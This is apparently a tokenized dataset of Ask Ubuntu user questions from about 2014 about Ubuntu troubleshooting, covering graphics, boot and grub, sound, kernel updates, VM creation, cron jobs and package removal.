408323	motion eye not working - on ubuntu 13.10	i recently installed ubuntu 13.10 on my sony vgn-cr19vn/b laptop and my motion eye camera is n't working . i tried it with skype and it does n't recognize it . i tried to search for additional drivers , but there do n't seem to be any . i do n't know what else to do , any suggestions ?
408327	virtual console not reading ~/.bashrc	i 'm using ubuntu 13.04 , and have set up some custom functions in ~/.bashrc . the custom functions work fine when i open a terminal within the gnome environment . when i switch over to a virtual console ( with ctrl+alt+f1 ) , i do n't get those functions . how can i resolve this issue ?
408328	no sound - often problem	many times , when i open my pc the sound is dead , though when i go to system settings / audio , everything seems right . when i restart my computer the sound is back to normal again . i saw some comments with commands , but i do n't know where to write these commands . please help me with both of the problems : 1 . where do i write the commands ? ( i probably need a full explanation ) 2 . is there any command to troubleshoot this ?
408331	update to 3.13 kernel on ubuntu 13.10	since my ati hybrid graphics card is n't working well under linux , i wanted to try the new kernel . i do n't want to update to 14.04 just yet , because of some missing dependencies and there does n't seem to be a kernel for 13.10 in the ubuntu mainline ( kernel.ubuntu.com/~kernel-ppa/mainline/ ) . is there another way to install the new kernel ?
408333	kubuntu 13.10 - left click causes scrolling	i 'm running kubuntu 13.10 on a toshiba satellite , and left clicking on the physical buttons below the touchpad causes a single tick of downward scrolling along with the expected function of the left click . this is not a major detriment , but it is thoroughly annoying , nonetheless . i 've tried everything short of editing the system 's .conf files . thanks , james .
408336	saucy is intermittently losing video sync ! - how to isolate & repair ?	since upgrading to ubuntu 13.10 from 13.04 i have been having a really annoying issue where my laptop screen will sometime go white or just all colored static . there is no rhyme or reason , it may not happen for a day or several times within an hour . every time it happen i just powered off turned it right back on and everything is fine . the only thing that i can tell so far is that every time it happens i hear the fan of the laptop gets noticeably louder . it did happen every once and a while with 13.04 but with 13.10 it has gotten worse . how can i begin to trouble shoot this and try to isolate the problem ? details show : processor : intel® core™ i7-3612qm cpu @ 2.10ghz × 8 graphics : intel® ivybridge mobile
408340	is there any significance to using tee	why is it that almost all instructions regarding appending text to system files like fstab and /etc/apt/sources.list.d/ < name > .list involve using tee and echo to append said text ? take the following examples , which are run as root : # # 1 echo 'deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen ' | tee file1 # # 2 echo 'deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen ' > file2 running diff -u file1 file2 returns nothing ; running md5sum file1 file2 shows their md5sums are identical , which brings me back to my original question : why is the | tee < filename > so prevalent across ubuntu docs , is it just good practice , otherwise would n't it be easier to just use example 2 instead of passing the output from echo to tee ?
408341	`` bug : unable to handle kernel paging request at '' while installing ubuntu	i have an old laptop sony vaio vgn-s580p that has install problems with 12.04.3 and 13.04 . i have tried using the wubi as well as burning an iso directly for both versions . any way i try to install it i get an error that is just white text on black with nothing that i understand . are there any known problems with this laptop and ubuntu ? is it just too old to run ? here 's the gobbeldegook :
408342	after ubuntu update display size is 7 '' and it loads a mobile version of ubuntu	using ubuntu 13.10 after the latest update i restarted . now there is no mouse cursor , the screen resolution has changed to 1920x1080 and the text is unnecessarily huge . i managed to get to the display settings and found that ubuntu falsely believes the screen is 7 '' when actually it 's connected via . hdmi to a 32 '' tv . screenshot : the graphics card is an ati radeon 5450 using proprietary `` fglrx-updates '' driver . i have tried using xorg , but it 's even worse with the same issues only a max resolution of 1024x768 . update : every time the desktop loads i get a system problem detected error and asks if i want to report it . there 's also some other strange problems like in totem if it 's full-screen the bar which pops up at the bottom no longer appears on mouse movement and instead the screen just flickers . any ideas or suggestions ?
408352	why do i get that error from a cron job ?	i am trying to write a cron script to check if my minecraft server is running or not and if it is down to run the start up script . here is what i have and this is the error i get when running it /bin/sh : 1 : syntax error : eof in backquote substitution the line in my cron file : 10,20 , ,30 , ,40 , ,50 * * * * cd /home/jon/ftb/ftbnew ; running=grep minecraft ; if [ -n `` $ running '' ] ; then end ; else bash serverstart.sh
408353	dual boot ubuntu problem	i am trying to have a dual boot ubuntu with win 7 on my laptop.i face a problem i could n't understand.after i free a space ( about 11gb ) for ubuntu installation , i could n't find it when i try to install ubuntu from a dvd.i could n't specify the problem reason is it due to my hard drive partitioning or not . my hard drive volumes ( partitions ) are all simple volume not primary . here a snapshot of my disk management http : //oi42.tinypic.com/dpd7oj.jpg here is how i find my hard drive during installing ubuntu http : //oi44.tinypic.com/21b9fs4.jpg instead of finding my volumes with the free space . could any one help me how to solve this problem or even declare the problem for me in a more detailed view.is it the simple volumes problem or something else .
408354	what does this mean & what impact does it have : failed to download repository information	today out of the clear blue i received the following message when i ran my updater under ubuntu 13.10 laptop . failed to download repository information . i see there are a ton of questions regarding this issue but this is not a duplicate because this is just more of an over view that i am looking for . so i did apt-get update and started seeing a bunch of 404 errors . i am far from a linux pro , so how do i read these errors and how can i tell if these are important ? i can tell you i have never manually modified the source list directly . and if these are dead ppa sources how can i remove and what does the letter mean in the below , almost looks like a drive letter but i dont have a w : drive . w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
408357	problems with keyring login	i have not been able to log in to keyring..i do not remember ever having a key ring account..so how do i establish a password ?
408364	a : how to disable generation of thubmnail just for video / movie ?	how to disable generation of thumbnails for video files in file browser ? solved accordingly to this answer . install dconf-tools package and run dconf-editor . `` in the tree on the left , navigate org → gnome → desktop → thumbnailers , then edit the disable option in the right pane as above . '' i 've typed value [ 'video/avi ' , 'video/mp4 ' ] to the disable named field . works like a charm , video thumbnails ( of provided mime types ) are no longer generated in nautilus .
408365	gnome 3.10 sharing desktop -- - how to configure the security type for vnc ?	the facts : i had a configuration for sharing my desktop that worked till the recent update of gnome desktop to use sgnome-shell 3.10 . i used to connect to my machine form a windows one using tightvnc and it worked flawlessly till yesterday ( 2014-19-1 ) . now the connection from the windows side is failing ( full log in pastebin ) with this error : which digging the log it is : [ 5872/ 6448 ] 2014-01-20 12:11:18:247 list of security type is read [ 5872/ 6448 ] 2014-01-20 12:11:18:247 : security types received ( 1 ) : unknown type ( 18 ) [ 5872/ 6448 ] 2014-01-20 12:11:18:247 selecting auth-handler [ 5872/ 6448 ] 2014-01-20 12:11:18:247 + remoteviewercore . exception : no security types supported . server sent security types , but we do not support any of their . the `` sharing '' part is configured as it should , as you can see here : the diagnosis : it seems that the update changed the security type to a new one not known by tightvnc ( it happened in the past ) . the question : until tightvnc ( and the rest of the world ) catches up , is it possible to configure the internal vnc server to use the previous security type ?
408368	`` mount at startup '' hdd error	primary my disk is ssd ( os , home ) and secondary is hdd for data . when i 'm trying to made my hdd `` mount at startup '' , i 'm getting error on startup ( see it ) when option is `` automatic mount option '' all is ok , but it is n't mounted on startup until i click on it . i need that it would be mounted on startup cause of i 'm getting error of dropbox that can not find the disk and i need restart the dropbox . /dev/sda1 : uuid= '' 37ab3801-11f0-4dcd-b833-f929c21bbea4 '' type= '' ext4 '' /dev/sda5 : uuid= '' 4f0c58f1-1947-463f-98b4-b3d1c0d0a1fe '' type= '' ext4 '' /dev/sdb1 : uuid= '' 669bf7ce-53bd-416e-a708-e4564b60d0cb '' type= '' swap '' /dev/sdb5 : label= '' data '' uuid= '' 03654b89-86c0-4fa5-bd35-fa5355695bcb '' type= '' ext4 ''
408369	location of installed mpich-mpd-bin	i had install mpich2 from ubuntu repository by doing : ( script 1 ) sudo apt-get install mpich2 i am glad that i found the default location for installed mpiexec , mpicc , mpif90 , etc . meanwhile , where can i find mpich-mpd-bin or mpd or smpd ? i need to use mpd to run my model . did the mpich-mpd-bin is also installed when we do the previous script ( script 1 ) ?
408372	which are the windows that are in the current workspace ?	is there a way to know easily which are the windows that are placed in the current workspace ( unity ) ? it seems a stupid question but is not : if a window is behind the others and therefore is not visible , then it 's impossible to figure out if that program is on the current workspace or not , unless i decide to move all the windows , which is obviously annoying . i am using ubuntu 12.04 , apt-get upgraded today . thanks for the answers ! : )
408373	can not install spark im 2.6.3 , getting permission denied error even though i am root	i am trying to install spark im in my ubuntun vm , however i am running into all kinds of problems . the steps i have taken so far were : download the tar.gz file from the website unpack it cd /home/user/downloads/spark sudo chmod +x spark sudo chmod +x starter cd .. sudo mv spark/ /opt to run , the spark im , i do the following commands : sudo su cd /opt sh spark/spark and as a result , i get the error : preparing jre ... spark/spark : 150 : spark/spark : bin/unpack200 : permission denied error unpacking jar files . aborting . you might need administrative priviledges for this operation . which makes no sense at all , because i am running in root mode . if i run sh spark/starter i get the exact same mistake . if i try to run it as an executable file , i get a similar error : bash : ./spark/starter : permission denied what am i doing wrong ? why can i not install this ?
408377	vmbuilder kvm wont create a virtual machine	i 'm trying to build a virtual machine using vmbuilder and kvm on a new file server that i 'm putting together so that i can run utilities on the vm without risking any issues with the file server . i 'm using https : //help.ubuntu.com/community/kvm/createguests as a guide as i do n't have a lot of experience with servers . when i run the ubuntu-vm-builder command it appears to run and although it does give errors it seems to carry on anyway and looks as though the script tries to start the vm . however when i run virsh list -- all no virtual machines are listed and no new devices appear on the network . also i ca n't see any images appear in /var/lib/libvirt/images but unless i sudo , that directory is permission denied . the output of vmbuilder is below , any ideas to point me in the right direction as i ca n't find this problem on good old google etc . thanks andrew andrew @ fileserver : / $ sudo ubuntu-vm-builder kvm ubuntu -- suite precise -- domain lan -- dest utilities -- hostname utilities -- mem 256 -- user andrew -- pass xxxxxxxxxx -- components main , universe -- addpkg acpid -- addpkg openssh-server -- addpkg avahi-daemon -- flavour virtual -- arch amd64 \ -o -- libvirt qemu : ///systemvirsh # [ sudo ] password for andrew : 2014-01-20 19:15:50,467 info : calling hook : preflight_check 2014-01-20 19:15:50,472 info : calling hook : set_defaults 2014-01-20 19:15:50,473 info : calling hook : bootstrap 2014-01-20 19:19:34,316 info : calling hook : configure_os extracting templates from packages : 100 % 2014-01-20 19:20:35,371 info : updating certificates in /etc/ssl/certs ... 152 added , 0 removed ; done . 2014-01-20 19:20:35,373 info : running hooks in /etc/ca- certificates/update.d ... .done . 2014-01-20 19:20:36,515 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:20:38,713 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:20:40,543 info : invoke-rc.d : policy-rc.d denied execution of force- reload . 2014-01-20 19:20:40,555 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:20:41,427 info : creating ssh2 rsa key ; this may take some time ... 2014-01-20 19:20:41,474 info : creating ssh2 dsa key ; this may take some time ... 2014-01-20 19:20:41,479 info : creating ssh2 ecdsa key ; this may take some time ... 2014-01-20 19:20:41,961 info : invoke-rc.d : policy-rc.d denied execution of stop . 2014-01-20 19:20:41,962 info : 2014-01-20 19:20:41,963 info : warning : fake initctl called , doing nothing 2014-01-20 19:20:41,963 info : 2014-01-20 19:20:41,963 info : warning : fake initctl called , doing nothing 2014-01-20 19:20:46,347 info : 2014-01-20 19:20:46,348 info : current default time zone : 'etc/utc' 2014-01-20 19:20:46,350 info : local time is now : mon jan 20 19:20:46 utc 2014 . 2014-01-20 19:20:46,351 info : universal time is now : mon jan 20 19:20:46 utc 2014 . 2014-01-20 19:20:46,351 info : extracting templates from packages : 100 % 2014-01-20 19:21:30,258 info : invoke-rc.d : policy-rc.d denied execution of stop . 2014-01-20 19:21:40,301 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:21:40,944 info : invoke-rc.d : policy-rc.d denied execution of restart . 2014-01-20 19:21:48,042 info : 2014-01-20 19:21:48,043 info : current default time zone : 'etc/utc' 2014-01-20 19:21:48,045 info : local time is now : mon jan 20 19:21:48 utc 2014 . 2014-01-20 19:21:48,046 info : universal time is now : mon jan 20 19:21:48 utc 2014 . 2014-01-20 19:21:48,046 info : run 'dpkg-reconfigure tzdata ' if you wish to change it . 2014-01-20 19:21:48,046 info : 2014-01-20 19:21:48,699 info : invoke-rc.d : policy-rc.d denied execution of stop . 2014-01-20 19:22:04,527 info : gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed 2014-01-20 19:22:04,529 info : gpg : key fbb75451 : `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' not changed 2014-01-20 19:22:04,531 info : gpg : key c0b21f32 : public key `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' imported 2014-01-20 19:22:04,532 info : gpg : key efe21092 : public key `` ubuntu cd image automatic signing key ( 2012 ) < cdimage @ ubuntu.com > '' imported 2014-01-20 19:22:04,533 info : gpg : total number processed : 4 2014-01-20 19:22:04,533 info : gpg : imported : 2 ( rsa : 2 ) 2014-01-20 19:22:04,533 info : gpg : unchanged : 2 2014-01-20 19:22:04,534 info : gpg : no ultimately trusted keys found 2014-01-20 19:22:08,199 info : gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' not changed 2014-01-20 19:22:08,201 info : gpg : key fbb75451 : `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' not changed 2014-01-20 19:22:08,203 info : gpg : key c0b21f32 : `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' not changed 2014-01-20 19:22:08,205 info : gpg : key efe21092 : `` ubuntu cd image automatic signing key ( 2012 ) < cdimage @ ubuntu.com > '' not changed 2014-01-20 19:22:08,205 info : gpg : total number processed : 4 2014-01-20 19:22:08,205 info : gpg : unchanged : 4 2014-01-20 19:22:08,235 info : no packages found matching linux-image- [ 0-9 ] * . 2014-01-20 19:22:16,998 info : invoke-rc.d : policy-rc.d denied execution of stop . 2014-01-20 19:22:22,101 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:22:25,709 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:22:27,947 info : invoke-rc.d : policy-rc.d denied execution of restart . 2014-01-20 19:22:30,374 info : invoke-rc.d : policy-rc.d denied execution of start . 2014-01-20 19:22:35,930 info : cleaning up 2014-01-20 19:22:35,931 info : calling hook : preflight_check 2014-01-20 19:22:35,932 info : calling hook : configure_networking 2014-01-20 19:22:35,956 info : calling hook : configure_mounting 2014-01-20 19:22:35,960 info : calling hook : mount_partitions 2014-01-20 19:22:35,960 info : mounting target filesystems 2014-01-20 19:22:35,960 info : creating disk image : `` /tmp/tmpno88mx '' of size : 5120mb 2014-01-20 19:22:36,143 info : adding partition table to disk image : /tmp/tmpno88mx 2014-01-20 19:22:36,250 info : adding type 4 partition to disk image : /tmp/tmpno88mx 2014-01-20 19:22:36,251 info : partition at beginning of disk - reserving first cylinder 2014-01-20 19:22:36,300 info : adding type 3 partition to disk image : /tmp/tmpno88mx 2014-01-20 19:22:36,305 info : [ 0 ] ../../libparted/filesys.c:148 ( ped_file_system_type_get ) : file system alias linux-swap ( new ) is deprecated 2014-01-20 19:22:36,343 info : creating loop devices corresponding to the created partitions 2014-01-20 19:22:36,363 info : creating file systems 2014-01-20 19:22:36,472 info : mke2fs 1.42 ( 29-nov-2011 ) 2014-01-20 19:22:37,328 info : mkswap : /dev/mapper/loop0p2 : warning : do n't erase bootbits sectors 2014-01-20 19:22:37,328 info : on whole disk . use -f to force . 2014-01-20 19:22:40,500 info : calling hook : install_bootloader 2014-01-20 19:23:05,313 info : removing update-grub hooks from /etc/kernel-img.conf in favour of 2014-01-20 19:23:05,313 info : /etc/kernel/ hooks . 2014-01-20 19:23:05,395 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:05,440 info : searching for default file ... generating /boot/grub/default file and setting the default boot entry to 0 2014-01-20 19:23:05,441 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:05,446 info : testing for an existing grub menu.lst file ... 2014-01-20 19:23:05,446 info : 2014-01-20 19:23:05,446 info : could not find /boot/grub/menu.lst file . would you like /boot/grub/menu.lst generated for you ? ( y/n ) /usr/sbin/update-grub : line 1094 : read : read error : 0 : bad file descriptor 2014-01-20 19:23:08,149 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:08,191 info : searching for default file ... found : /boot/grub/default 2014-01-20 19:23:08,194 info : testing for an existing grub menu.lst file ... 2014-01-20 19:23:08,194 info : 2014-01-20 19:23:08,194 info : could not find /boot/grub/menu.lst file . 2014-01-20 19:23:08,195 info : generating /boot/grub/menu.lst 2014-01-20 19:23:08,255 info : searching for splash image ... none found , skipping ... 2014-01-20 19:23:08,389 info : grep : /boot/config* : no such file or directory 2014-01-20 19:23:08,467 info : updating /boot/grub/menu.lst ... done 2014-01-20 19:23:08,467 info : 2014-01-20 19:23:08,773 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:08,815 info : searching for default file ... found : /boot/grub/default 2014-01-20 19:23:08,819 info : testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst 2014-01-20 19:23:08,923 info : searching for splash image ... none found , skipping ... 2014-01-20 19:23:08,949 info : grep : /boot/config* : no such file or directory 2014-01-20 19:23:09,030 info : updating /boot/grub/menu.lst ... done 2014-01-20 19:23:09,031 info : 2014-01-20 19:23:09,175 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:09,181 info : calling hook : install_kernel 2014-01-20 19:23:38,873 info : done . 2014-01-20 19:23:49,364 info : running depmod . 2014-01-20 19:23:49,417 info : update-initramfs : deferring update ( hook will be called later ) 2014-01-20 19:23:49,423 info : examining /etc/kernel/postinst.d . 2014-01-20 19:23:49,424 info : run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.2.0-58-virtual /boot/vmlinuz-3.2.0-58-virtual 2014-01-20 19:23:49,453 info : run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-58-virtual /boot/vmlinuz-3.2.0-58-virtual 2014-01-20 19:23:49,456 info : update-initramfs : generating /boot/initrd.img-3.2.0-58-virtual 2014-01-20 19:23:51,491 info : run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-58-virtual /boot/vmlinuz-3.2.0-58-virtual 2014-01-20 19:23:51,576 info : searching for grub installation directory ... found : /boot/grub 2014-01-20 19:23:51,624 info : searching for default file ... found : /boot/grub/default 2014-01-20 19:23:51,627 info : testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst 2014-01-20 19:23:51,730 info : searching for splash image ... none found , skipping ... 2014-01-20 19:23:51,790 info : found kernel : /boot/vmlinuz-3.2.0-58-virtual 2014-01-20 19:23:51,891 info : replacing config file /run/grub/menu.lst with new version 2014-01-20 19:23:51,914 info : updating /boot/grub/menu.lst ... done 2014-01-20 19:23:51,915 info : 2014-01-20 19:23:55,292 info : calling hook : post_install 2014-01-20 19:23:55,293 info : calling hook : unmount_partitions 2014-01-20 19:23:55,293 info : unmounting target filesystem 2014-01-20 19:23:59,632 info : calling hook : convert 2014-01-20 19:23:59,633 info : converting /tmp/tmpno88mx to qcow2 , format utilities/tmpno88mx.qcow2 2014-01-20 19:24:03,784 info : calling hook : fix_ownership 2014-01-20 19:24:03,827 info : calling hook : deploy 2014-01-20 19:24:03,857 info : calling hook : fix_ownership andrew @ fileserver : / $ virsh 'list -- all' id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- andrew @ fileserver : /var/lib/libvirt $
408382	enable wobbly windows correctly	whenever i want to enable the wobbly windows plugin in ccsm , it tells me the following : plugin `` snapping windows '' provides the feature `` edgeresistance '' , which is also provided by `` wobbly windows '' . i have the options to keep ww disabled or to enable ww and disable snapping . when i do this my gui gets unusable ( decoration vanished , unity not working , ... ) until i delete all compiz configuration files manually in tty . so how do i enable wobbly windows correctly ?
408385	strange theme after download	i downloaded cairodock yesterday and since i rebooted my system it shows me this weird theme , with orange windows and little white borders around programs , also my icons are messed up , the top right is showing some very old-fashioned icons instead of the normal humanity icons . i tried to change the theme using ubuntu tweak tool and myunity , this did not have any effect , i am able to change the icons , but not the theme . i tried deleting cairodock , but this did not have any effect . does anybody know what to do ?
408389	hosts file and unclear behavior . how to make real alias ?	i 'm trying to create alias for my local website which is runned by vagrant ( virtual box ) , hence i want redirect any requests from site.ru to 192.168.10.10/site.ru via /etc/hosts file . in the hosts file i have the following : ... 192.168.10.10/site.ru site.ru however it does n't work as i want . when i go to site.ru i 'm appear in the 'real ' site . i hope anybody understand me to answer for my question.. what did i do wrong ? update : solution : how to setup mass dynamic virtual hosts in nginx ?
408390	what happens to my phone service provider contract if i replace android with ubuntu ?	i ca n't seem to easily locate an answer with google . i have the typical 2-year contract with sprint on my android phone . i 'm curious how ubuntu effects that ? does the 4g and sms/phone services stay with the phone even though the android system has been replaced with ubuntu ?
408393	tried formatting usb to ntfs and now i can no longer mount it or format it	i recently formatted my usb drive to ntfs using the command terminal however since then i am unable to mount the usb to my pc and when i try to reformat the usb it says that the permissions are set to read only . can anybody help me with this ? `` error mounting /dev/sdc1 at /media/fabio/usb disk : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc1 '' `` /media/fabio/usb disk '' ' exited with non-zero exit status 13 : can only open '/dev/sdc1 ' as read-only $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdc1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . ''
408394	uefi booting in hp envy x2 g050la insyde bios	it is not a duplicate , since the uefi options are not available other than disabling secure boot on it . it just does n't boot to ubuntu livecd at all ( i 've changed boot order . ) , and trying to boot from an efi file within the pendrive/dvd fails with a `` device failed to authenticate '' and `` device failed to boot '' error . i 've tried from 12.04.3 to 13.10 in 32 and 64-bits ( since some other uefi related issues mentioned x32 efi not being `` read properly '' , i 've tried 64-bits first ) without any chance of it booting into ubuntu . ( probably is the processor or the integrated graphics , but ... ) is there any possible way ( since the uefi howto ubuntu page does n't seem to solve this problem , including wubi installs ) to use a signed efi file ( or uefi ubuntu distro that would work on it ) to be able to boot into livecd/installer of ubuntu ? specs : intel atom z2760 1.80ghz processor 2gb of ram and a 64gb ssd .
408395	stream media from ubuntu 12.04 to xbox one	not sure if this is an ubuntu question , but i 've posted in xbox forums too , so hopefully i 'll get some help ! as the title says , i 'm looking for a way to stream media from my ubuntu 12.04 laptop to my xbox one console.. any ideas ? i 've done a bit of research , and so far i can see that the xbox one only supports playing media from a dlna server via a 'play to ' feature , i.e . it ca n't pull files from the server , the files need to be pushed from the server ( my laptop ) to the console , so i was wondering if there is anything that will work on ubuntu that will give me this feature..
408398	ignore certain dotfiles from backup	when using the packaged ubuntu backup preferences pane , there is an option to ignore folders . traditionally when using a nautilus based file dialogue , you could press ctrlh to hide/show dotfiles , or hidden files in the unix directory structure . this does not appear to be the case when working with the backup tool ignore path dialogue box . if i wanted to add a specific dotfile path for backup to safely ignore , where would i place that configuration value ?
408401	why does ubuntu 13.10 on a amd fusion boot into a corrupted graphical screen ?	i have installed ubuntu 13.10 via the usb installer on my htpc with asus f1a75-m with amd a4-3400 . it doesnâ´t startup to the graphical mode . i do see the ubuntu boot logo ( with red dots ) then it switches to graphical mode and stalls on the screen as shown in the figure . it does boot with the option nomodeset , but then it does not detect the screen at the maximal resolution . has anyone a clue where this goes wrong and how to solve it ? my goal is to install ubuntu running on the oss drivers ( for xbmc with radeon oss with vdpau ) , so i do not like to install the ati closed source drivers . photo of tv screen with corrupted image thank you in advance !
408405	how to boot ubuntu from another disk	my senario is : i have a desktop computer with two disk . one of disk is ssd and other is hdd . i install windows 8 on ssd and i use hdd for data . then i want to install ubuntu 13.10 on hdd with seperated partition on hdd and i install ubuntu 13.10 . now my computer has windows 8 on ssd and ubuntu 13.10 on hdd . but when i change boot order ( first bootable disk to hdd ) to boot ubuntu from hdd , ubuntu did n't start . how can i start the ubuntu on hdd which already installed on ?
408408	is network manager widget supposed to be installed by default in kde ? even so i do n't have it installed and errors prevent from installation	i 've looked on the internet but i have n't seen anything that really imo helps me to try to solve this problem . actually the problem that led me to want to install `` network-manager-kde '' is the fact that i do not have any type of network notification type widget ( something that shows what networks are available , if i 'm connected or not ect ... nn my panel ) like most distributions or os 's have on my installation of kde ( at least for now i assume ) . so obviously a question i have is : is the `` network-manager-kde '' something that can be put on a panel and even with errors ( see below ) ? how can i install it ? i have a copy of the output ( with the problem ) when i try to install it from the terminal : sudo apt-get install network-manager-kde [ sudo ] password for _____ : reading package lists ... done building dependency tree reading state information ... done package network-manager-kde is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'network-manager-kde ' has no installation candidate this is pretty much where i am stuck at . if anyone has any information that can help me fix this problem , the help will be much appreciated .
408410	window manager affects 3d performance - how to work around it ?	i learned the hard way that enabling compositing vm will affect 3d performance . what can i do today to be able play games on linux with no performance penalty ? i guess i could create user with different wm , but i do n't want to loose other user x session . can i 'hibernate ' it somehow ? what are my options ?
408413	( ubuntu server 12.04 ) ethernet not working after switching to another port	i recently just made a new ubuntu server and want to copy my stuff from the old server to the new one . i connected the new server to the old ethernet cable ( on the same port as old one ) and gave the old one a new ethernet cable and connected it ( to a different ethernet port ) and now the old server is not getting internet access . what happened and how can i fix it ? thanks
408417	how to remove the folllowing applications from xubuntu ?	the software that have red dots next to them , i want to uninstall them , since i have synapse , kazam , xpad instead and the rest , i do n't need . i tried software center , and synaptic and apt-get , could not locate them . also how to remove xfce4-terminal ? i tried apt-get , but it will remove a billion library related to xfce , is it safe to remove it that way ? because i have terminator and xterm . the `` electronic '' section , i want to remove it , because it only has arduino ide , which is also available in the development section , thus i do n't need it .
408421	how to stop a script to start xampp by default in a startup	i was wondering about how to start xampp in my ubuntu 13.04 just with a script , i end up with a script that will start xampp after i start my machine automatically . what i did is : sudo gedit /etc/init.d/lampp a lampp file open with gedit . then # ! /bin/bash /opt/lampp/lampp start paste it in lampp to make it executable sudo chmod +x /etc/init.d/lampp run following command to install init scripts to all runlevel sudo update-rc.d lampp defaults i got success after i rebooted and xampp starts automatically but when rebooting a script is running in a black background which i think is initialising the xampp and starting it . now i want to remove it as its forcing xampp to start with bootloader.so for that i opened lamp file again in gedit and removed the lines # ! /bin/bash /opt/lampp/lampp start . my xampp is not starting after a reboot but the script is initialising with bootloader before login screen come . is there a way to rever that update command or stop it by default ? and also after that i am facing a serious screen resolution problem where my screen comes to type laptop and 640 reso before i was running in 1024*768 with 75hz . i have configured it with monitors.xml file located in home/config/monitors.xml i have updated my nvidia drivers with sudo apt-get install nvidia-current.and i could not configure nvidia drivers by typing gksu nvidia-xconfig its asking for admin password when i enter it exiting . the admin password i guess i am giving wrong putting my username password thnks for the help in adv .
408424	kde sometimes glitches on wakeup	well , a picture is work 1k words : looks bad , huh ? i am using the 331-updates latest 331.67 drivers from nvidia 's website on a dell latitude e6400 . everything else is up-to-date . this only happens when i resume from sleep , or i switch to a vt and back . it also does n't always happen , which i find odd . graphics card : nvidia quadro nvs160m update after testing : this problem only exists with kde ( specifically qt ) . i can go into unity or mint or any non qt-based gui and it works perfectly with no resume errors . update : this only happens when i use kwin ( and kde ) . i have upgraded to 14.04 and the problem is not occurring as frequently . also , sometimes this effect does n't happen , but instead the top menu bar simply goes out of focus with the rest of the screen goes blank .
408426	ca n't get windows to boot from grub	i recently installed ubuntu 13.10 and am having some issues getting grub to work with me . whenever i want to get to grub ( to boot ubuntu ) , i have to manually select it : . then i can select ubuntu from there . however , i want to make grub the default bootloader for my machine so it does n't autoboot into windows if i forget to press esc on boot . my grub screen looks like this : . when i select windows , i get this screen : . if someone could help me figure out how to make grub my default bootloader and how to boot into windows from grub , i would love it ! thanks : d
408429	how do you make ubuntu server accept files sent over bluetooth ?	how do you configure ubuntu server to automatically receive files over bluetooth and save them with no user interaction ? this question is almost identical to this question from 2 years ago , but relates to ubuntu server , where no gui is available . edit : to clarify , this question is not about pairing bluetooth devices , but about making an ubuntu server machine automatically accept bluetooth file transfers . this question is not a duplicate .
408433	uninstall gnome 3.10 problem	gnome 3.10 just wont seem to uninstall ... i installed it using the method from here sudo add-apt-repository ppa : gnome3-team/gnome3-next sudo apt-get update sudo apt-get install gnome-shell ubuntu-gnome-desktop ( possibly - i just copied these in from the op 's link - from @ wilf ) sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get dist-upgrade sudo apt-get install gnome-weather gnome-music gnome-maps cheese gnome-documents it also had these uninstall instructions : sudo ppa-purge ppa : gnome3-team/gnome3-next sudo ppa-purge ppa : gnome3-team/gnome3-staging sudo ppa-purge ppa : gnome3-team/gnome3 sudo apt-get remove gnome-shell ubuntu-gnome-desktop i have tried every solution i stumbled upon . however , parts of it seem to remain no matter what . ppa-purge cant find any packages to purge etc etc..
